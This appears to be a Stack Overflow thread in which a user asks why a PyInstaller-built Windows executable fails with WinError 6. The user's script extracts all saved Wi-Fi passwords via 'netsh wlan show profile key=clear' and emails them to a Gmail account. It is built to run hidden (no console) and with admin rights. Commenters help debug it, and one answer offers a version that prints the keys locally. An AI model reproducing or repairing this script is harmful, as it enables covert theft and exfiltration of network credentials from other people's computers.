# WinError 6 while executing a python.exe

Tags: python, windows, subprocess

```
Traceback (most recent call last):
  File "main.py", line 6, in <module>
  File "subprocess.py", line 424, in check_output
  File "subprocess.py", line 505, in run
  File "subprocess.py", line 829, in __init__
  File "subprocess.py", line 1252, in _get_handles
OSError: [WinError 6] The handle is invalid
```

And my code for exe is:

```
import subprocess
import smtplib
import re

command1 = "netsh wlan show profile"
networks = subprocess.check_output(command1, shell=True)
network_list = re.findall('(?:Profile\s*:\s)(.*)', networks)

final_output = ""
for network in network_list:
    command2 = "netsh wlan show profile " + network + "key=clear"
    one_network_result = subprocess.check_output(command2, shell=True)
    final_output += one_network_result

subprocess._cleanup()

server = smtplib.smtp("smtp.gmail.com", 587)
server.starttls()
server.login("stackoverflowtest@gmail.com", "pleaseplease")
server.sendmail("stackoverflowtest@gmail.com","stackoverflowtest@gmail.com",final_output)
server.quit()
quit()
```

I am trying to make a test upon how to automate and recover wifi passwords, but a error is occurring when I click on the .exe (python) file. Please help.

I used pyinstaller like pyinstaller --uac-admin --onefile --noconsole {filename}.py

Comment: It's unclear what you mean about clicking on the .exe file. Other than the `python.exe` file which runs the interpreter, there are no others involved. Run interpreter with no arguments will open a python console. If a file name is given as an argument it is assumed to be then name of a Python script (which are text files with the .py extension). Just clicking on `python.exe`  would not produce the Traceback shown in your question.

Comment: I used pyinstaller like

pyinstaller --uac-admin --onefile --noconsole {filename}

Comment: Can you please help?

Comment: Does the script work not turned into an exe?

Comment: Yes it does work

Comment: OK, that tells you the problem is due to the conversion to an .exe, so you can now attempt to determine what part of it is failing (and hopefully the reason for it). I would start by printing out what's in the `network_list` that's created (you may have make it a console app in order to see what's printed).

Comment: Okay I will do it

Answer (score 0):

Well, the question was a bit unclear, but I assume, you need to see your wifi passwords..

Took a bit of time, but this should work:

```
import subprocess

data = subprocess.check_output(['netsh', 'wlan', 'show', 'profiles']).decode('utf-8').split('\n')
profiles = [i.split(":")[1][1:-1] for i in data if "All User Profile" in i]
for i in profiles:
    results = subprocess.check_output(['netsh', 'wlan', 'show', 'profile', i, 'key=clear']).decode('utf-8').split('\n')
    results = [b.split(":")[1][1:-1] for b in results if "Key Content" in b]
    try:
        print ("{:<30}|  {:<}".format(i, results[0]))
    except IndexError:
        print ("{:<30}|  {:<}".format(i, ""))
```

Comment: Traceback (most recent call last):
  File "main.py", line 5, in <module>
  File "subprocess.py", line 424, in check_output
  File "subprocess.py", line 505, in run
  File "subprocess.py", line 829, in __init__
  File "subprocess.py", line 1252, in _get_handles
OSError: [WinError 6] The handle is invalid

Comment: It still gives the same error...

Comment: Hello.. This Tweak should work if you're on Windows. Don't know about Linux
https://github.com/Zulko/moviepy/issues/1066